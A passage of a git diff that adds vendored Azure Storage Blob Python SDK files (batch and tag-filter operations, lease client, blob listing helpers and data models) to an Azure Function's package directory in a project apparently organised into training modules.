+ :paramtype multipart_content_type: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def filter_blobs( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + where=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> "_models.FilterBlobSegment" + """The Filter Blobs operation enables callers to list blobs across all containers whose tags match + a given search expression. Filter blobs searches across all containers within a storage + account but can be scoped within the expression to a single container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation.
The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py new file mode 100644 index 0000000..22b567a --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py @@ -0,0 +1,331 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import uuid + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, TypeVar, TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator import distributed_trace + +from ._shared.response_handlers import return_response_headers, process_storage_error +from ._serialize import get_modify_conditions + +if TYPE_CHECKING: + from datetime import datetime + + BlobClient = TypeVar("BlobClient") + ContainerClient = TypeVar("ContainerClient") + + +class BlobLeaseClient(object): # pylint: disable=client-accepts-api-version-keyword + """Creates a new BlobLeaseClient. + + This client provides lease operations on a BlobClient or ContainerClient. + + :ivar str id: + The ID of the lease currently being maintained. This will be `None` if no + lease has yet been acquired. + :ivar str etag: + The ETag of the lease currently being maintained. This will be `None` if no + lease has yet been acquired or modified. + :ivar ~datetime.datetime last_modified: + The last modified timestamp of the lease currently being maintained. + This will be `None` if no lease has yet been acquired or modified. + + :param client: + The client of the blob or container to lease. + :type client: ~azure.storage.blob.BlobClient or + ~azure.storage.blob.ContainerClient + :param str lease_id: + A string representing the lease ID of an existing lease. This value does not + need to be specified in order to acquire a new lease, or break one. + """ + def __init__( + self, client, lease_id=None + ): # pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + # type: (Union[BlobClient, ContainerClient], Optional[str]) -> None + self.id = lease_id or str(uuid.uuid4()) + self.last_modified = None + self.etag = None + if hasattr(client, 'blob_name'): + self._client = client._client.blob # type: ignore # pylint: disable=protected-access + elif hasattr(client, 'container_name'): + self._client = client._client.container # type: ignore # pylint: disable=protected-access + else: + raise TypeError("Lease must use either BlobClient or ContainerClient.") + + def __enter__(self): + return self + + def __exit__(self, *args): + self.release() + + @distributed_trace + def acquire(self, lease_duration=-1, **kwargs): + # type: (int, **Any) -> None + """Requests a new lease. + + If the container does not have an active lease, the Blob service creates a + lease on the container and returns a new lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
+ Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.acquire_lease( + timeout=kwargs.pop('timeout', None), + duration=lease_duration, + proposed_lease_id=self.id, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + self.etag = response.get('etag') # type: str + + @distributed_trace + def renew(self, **kwargs): + # type: (Any) -> None + """Renews the lease. + + The lease can be renewed if the lease ID specified in the + lease client matches that associated with the container or blob. Note that + the lease may be renewed even if it has expired as long as the container + or blob has not been leased again since the expiration of that lease. When you + renew a lease, the lease duration clock resets. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. 
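+
+        A minimal usage sketch (illustrative only; it assumes an existing
+        ~azure.storage.blob.BlobClient named ``blob_client`` from which this
+        lease was acquired)::
+
+            # blob_client is assumed to exist; acquire_lease() returns a BlobLeaseClient
+            lease = blob_client.acquire_lease()
+            # ... long-running work against the leased blob ...
+            lease.renew()  # renewing resets the lease duration clock
+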
+ :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.renew_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def release(self, **kwargs): + # type: (Any) -> None + """Release the lease. + + The lease may be released if the client lease id specified matches + that associated with the container or blob. Releasing the lease allows another client + to immediately acquire the lease for the container or blob as soon as the release is complete. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.release_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def change(self, proposed_lease_id, **kwargs): + # type: (str, Any) -> None + """Change the lease ID of an active lease. + + :param str proposed_lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns 400 + (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. 
+ If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.change_lease( + lease_id=self.id, + proposed_lease_id=proposed_lease_id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def break_lease(self, lease_break_period=None, **kwargs): + # type: (Optional[int], Any) -> int + """Break the lease, if the container or blob has an active lease. + + Once a lease is broken, it cannot be renewed. Any authorized request can break the lease; + the request is not required to specify a matching lease ID. When a lease + is broken, the lease break period is allowed to elapse, during which time + no lease operation except break and release can be performed on the container or blob. + When a lease is successfully broken, the response indicates the interval + in seconds until a new lease can be acquired. + + :param int lease_break_period: + This is the proposed duration of seconds that the lease + should continue before it is broken, between 0 and 60 seconds. This + break period is only used if it is shorter than the time remaining + on the lease. If longer, the time remaining on the lease is used. + A new lease will not be available before the break period has + expired, but the lease may be held for longer than the break + period. If this header does not appear with a break + operation, a fixed-duration lease breaks after the remaining lease + period elapses, and an infinite lease breaks immediately. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. 
``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Approximate time remaining in the lease period, in seconds. + :rtype: int + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.break_lease( + timeout=kwargs.pop('timeout', None), + break_period=lease_break_period, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return response.get('lease_time') # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py new file mode 100644 index 0000000..e5794fb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py @@ -0,0 +1,244 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from azure.core.paging import PageIterator, ItemPaged +from azure.core.exceptions import HttpResponseError +from ._deserialize import get_blob_properties_from_generated_code, parse_tags +from ._generated.models import BlobItemInternal, BlobPrefix as GenBlobPrefix, FilterBlobItem +from ._models import BlobProperties, FilteredBlob +from ._shared.models import DictMixin +from ._shared.response_handlers import return_context_and_deserialized, process_storage_error + + +class BlobPropertiesPaged(PageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. 
+ This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + prefix=None, + results_per_page=None, + continuation_token=None, + delimiter=None, + location_mode=None): + super(BlobPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.container = container + self.delimiter = delimiter + self.current_page = None + self.location_mode = location_mode + + def _get_next_cb(self, continuation_token): + try: + return self._command( + prefix=self.prefix, + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.container = self._response.container_name + self.current_page = [self._build_item(item) for item in self._response.segment.blob_items] + + return self._response.next_marker or None, self.current_page + + def _build_item(self, item): + if isinstance(item, BlobProperties): + return item + if isinstance(item, BlobItemInternal): + blob = get_blob_properties_from_generated_code(item) # pylint: disable=protected-access + blob.container = self.container + return blob + return item + + +class BlobPrefixPaged(BlobPropertiesPaged): + def __init__(self, *args, **kwargs): + super(BlobPrefixPaged, self).__init__(*args, **kwargs) + self.name = self.prefix + + def _extract_data_cb(self, get_next_return): + continuation_token, _ = super(BlobPrefixPaged, self)._extract_data_cb(get_next_return) + self.current_page = self._response.segment.blob_prefixes + self._response.segment.blob_items + self.current_page = [self._build_item(item) for item in self.current_page] + self.delimiter = self._response.delimiter + + return continuation_token, self.current_page + + def _build_item(self, item): + item = super(BlobPrefixPaged, self)._build_item(item) + if isinstance(item, GenBlobPrefix): + if item.name.encoded: + name = unquote(item.name.content) + else: + name = item.name.content + return BlobPrefix( + self._command, + container=self.container, + prefix=name, + results_per_page=self.results_per_page, + location_mode=self.location_mode) + return item + + +class BlobPrefix(ItemPaged, DictMixin): + """An Iterable of Blob properties. + + Returned from walk_blobs when a delimiter is used. + Can be thought of as a virtual blob directory. + + :ivar str name: The prefix, or "directory name" of the blob. + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str next_marker: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". 
+ :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str marker: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__(self, *args, **kwargs): + super(BlobPrefix, self).__init__(*args, page_iterator_class=BlobPrefixPaged, **kwargs) + self.name = kwargs.get('prefix') + self.prefix = kwargs.get('prefix') + self.results_per_page = kwargs.get('results_per_page') + self.container = kwargs.get('container') + self.delimiter = kwargs.get('delimiter') + self.location_mode = kwargs.get('location_mode') + + +class FilteredBlobPaged(PageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.FilteredBlob) + :ivar str container: The container that the blobs are listed from. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. 
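+
+    Example (an illustrative sketch; ``service_client`` is assumed to be an
+    existing ``BlobServiceClient``, whose ``find_blobs_by_tags`` method pages
+    its results with this iterator):
+
+    .. code-block:: python
+
+        # Each item is a FilteredBlob carrying name, container_name and tags.
+        for blob in service_client.find_blobs_by_tags("\"tagname\"='my tag'"):
+            print(blob.name, blob.tags)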
+ """ + def __init__( + self, command, + container=None, + results_per_page=None, + continuation_token=None, + location_mode=None): + super(FilteredBlobPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.marker = continuation_token + self.results_per_page = results_per_page + self.container = container + self.current_page = None + self.location_mode = location_mode + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.marker = self._response.next_marker + self.current_page = [self._build_item(item) for item in self._response.blobs] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + if isinstance(item, FilterBlobItem): + tags = parse_tags(item.tags) + blob = FilteredBlob(name=item.name, container_name=item.container_name, tags=tags) + return blob + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py new file mode 100644 index 0000000..d4e46df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py @@ -0,0 +1,1330 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-few-public-methods, too-many-instance-attributes +# pylint: disable=super-init-not-called, too-many-lines + +from enum import Enum + +from azure.core import CaseInsensitiveEnumMeta +from azure.core.paging import PageIterator +from azure.core.exceptions import HttpResponseError + +from ._shared import decode_base64_to_bytes +from ._shared.response_handlers import return_context_and_deserialized, process_storage_error +from ._shared.models import DictMixin, get_enum_value +from ._generated.models import ArrowField +from ._generated.models import Logging as GeneratedLogging +from ._generated.models import Metrics as GeneratedMetrics +from ._generated.models import RetentionPolicy as GeneratedRetentionPolicy +from ._generated.models import StaticWebsite as GeneratedStaticWebsite +from ._generated.models import CorsRule as GeneratedCorsRule +from ._generated.models import AccessPolicy as GenAccessPolicy + + +def parse_page_list(page_list): + """Parse a generated PageList into a single list of PageRange sorted by start. 
+ """ + page_ranges = page_list.page_range + clear_ranges = page_list.clear_range + + ranges = [] + p_i, c_i = 0, 0 + + # Combine page ranges and clear ranges into single list, sorted by start + while p_i < len(page_ranges) and c_i < len(clear_ranges): + p, c = page_ranges[p_i], clear_ranges[c_i] + + if p.start < c.start: + ranges.append( + PageRange(p.start, p.end, cleared=False) + ) + p_i += 1 + else: + ranges.append( + PageRange(c.start, c.end, cleared=True) + ) + c_i += 1 + + # Grab remaining elements in either list + ranges += [PageRange(r.start, r.end, cleared=False) for r in page_ranges[p_i:]] + ranges += [PageRange(r.start, r.end, cleared=True) for r in clear_ranges[c_i:]] + + return ranges + + +class BlobType(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + BLOCKBLOB = "BlockBlob" + PAGEBLOB = "PageBlob" + APPENDBLOB = "AppendBlob" + + +class BlockState(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Block blob block types.""" + + COMMITTED = 'Committed' #: Committed blocks. + LATEST = 'Latest' #: Latest blocks. + UNCOMMITTED = 'Uncommitted' #: Uncommitted blocks. + + +class StandardBlobTier(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the blob tier to set the blob to. This is only applicable for + block blobs on standard storage accounts. + """ + + ARCHIVE = 'Archive' #: Archive + COOL = 'Cool' #: Cool + HOT = 'Hot' #: Hot + + +class PremiumPageBlobTier(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the page blob tier to set the blob to. This is only applicable to page + blobs on premium storage accounts. Please take a look at: + https://docs.microsoft.com/en-us/azure/storage/storage-premium-storage#scalability-and-performance-targets + for detailed information on the corresponding IOPS and throughput per PageBlobTier. + """ + + P4 = 'P4' #: P4 Tier + P6 = 'P6' #: P6 Tier + P10 = 'P10' #: P10 Tier + P20 = 'P20' #: P20 Tier + P30 = 'P30' #: P30 Tier + P40 = 'P40' #: P40 Tier + P50 = 'P50' #: P50 Tier + P60 = 'P60' #: P60 Tier + + +class QuickQueryDialect(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Specifies the quick query input/output dialect.""" + + DELIMITEDTEXT = 'DelimitedTextDialect' + DELIMITEDJSON = 'DelimitedJsonDialect' + PARQUET = 'ParquetDialect' + + +class SequenceNumberAction(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Sequence number actions.""" + + INCREMENT = 'increment' + """ + Increments the value of the sequence number by 1. If specifying this option, + do not include the x-ms-blob-sequence-number header. + """ + + MAX = 'max' + """ + Sets the sequence number to be the higher of the value included with the + request and the value currently stored for the blob. + """ + + UPDATE = 'update' + """Sets the sequence number to the value included with the request.""" + + +class PublicAccess(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies whether data in the container may be accessed publicly and the level of access. + """ + + OFF = 'off' + """ + Specifies that there is no public read access for both the container and blobs within the container. + Clients cannot enumerate the containers within the storage account as well as the blobs within the container. + """ + + BLOB = 'blob' + """ + Specifies public read access for blobs. Blob data within this container can be read + via anonymous request, but container data is not available. Clients cannot enumerate + blobs within the container via anonymous request. 
+ """ + + CONTAINER = 'container' + """ + Specifies full public read access for container and blob data. Clients can enumerate + blobs within the container via anonymous request, but cannot enumerate containers + within the storage account. + """ + + +class BlobImmutabilityPolicyMode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the immutability policy mode to set on the blob. + "Mutable" can only be returned by service, don't set to "Mutable". + """ + + UNLOCKED = "Unlocked" + LOCKED = "Locked" + MUTABLE = "Mutable" + + +class BlobAnalyticsLogging(GeneratedLogging): + """Azure Analytics Logging settings. + + :keyword str version: + The version of Storage Analytics to configure. The default value is 1.0. + :keyword bool delete: + Indicates whether all delete requests should be logged. The default value is `False`. + :keyword bool read: + Indicates whether all read requests should be logged. The default value is `False`. + :keyword bool write: + Indicates whether all write requests should be logged. The default value is `False`. + :keyword ~azure.storage.blob.RetentionPolicy retention_policy: + Determines how long the associated data should persist. If not specified the retention + policy will be disabled by default. + """ + + def __init__(self, **kwargs): + self.version = kwargs.get('version', u'1.0') + self.delete = kwargs.get('delete', False) + self.read = kwargs.get('read', False) + self.write = kwargs.get('write', False) + self.retention_policy = kwargs.get('retention_policy') or RetentionPolicy() + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + version=generated.version, + delete=generated.delete, + read=generated.read, + write=generated.write, + retention_policy=RetentionPolicy._from_generated(generated.retention_policy) # pylint: disable=protected-access + ) + + +class Metrics(GeneratedMetrics): + """A summary of request statistics grouped by API in hour or minute aggregates + for blobs. + + :keyword str version: + The version of Storage Analytics to configure. The default value is 1.0. + :keyword bool enabled: + Indicates whether metrics are enabled for the Blob service. + The default value is `False`. + :keyword bool include_apis: + Indicates whether metrics should generate summary statistics for called API operations. + :keyword ~azure.storage.blob.RetentionPolicy retention_policy: + Determines how long the associated data should persist. If not specified the retention + policy will be disabled by default. + """ + + def __init__(self, **kwargs): + self.version = kwargs.get('version', u'1.0') + self.enabled = kwargs.get('enabled', False) + self.include_apis = kwargs.get('include_apis') + self.retention_policy = kwargs.get('retention_policy') or RetentionPolicy() + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + version=generated.version, + enabled=generated.enabled, + include_apis=generated.include_apis, + 